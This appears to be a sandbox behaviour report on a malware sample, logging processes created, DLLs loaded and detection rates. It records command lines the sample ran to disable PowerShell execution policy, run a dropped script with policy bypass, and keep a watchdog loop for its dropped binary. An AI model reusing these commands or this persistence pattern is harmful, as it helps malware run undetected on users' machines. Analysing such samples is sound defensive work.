Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KWPSWNSSERVER.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KWPSWNSSERVER.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KWPSWNSSERVER.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;KWPSWNSSERVER.EXE&apos;
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: tasklist.exe, 0000000A.00000002.2466231414.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465822500.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465842960.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465777381.00000000007E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KWPSWNSSERVER.EXE'Wbem;C
Source: tasklist.exe, 00000017.00000002.3064391218.0000000002F54000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063934382.0000000002F4F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063902721.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063959133.0000000002F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KWPSWNSSERVER.EXE'\Wbem;C:\Win
Source: OdiHmn3pRK.exeVirustotal: Detection: 28%
Source: OdiHmn3pRK.exeReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeFile read: C:\Users\user\Desktop\OdiHmn3pRK.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\OdiHmn3pRK.exe "C:\Users\user\Desktop\OdiHmn3pRK.exe"
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: microsoft.windowsappruntime.bootstrap.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: linit-v4.1.6.exe.lnk.3.drLNK file: ..\..\Public\Bilite\linit-v4.1.6.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: OdiHmn3pRK.exeStatic file information: File size 36618436 > 1048576
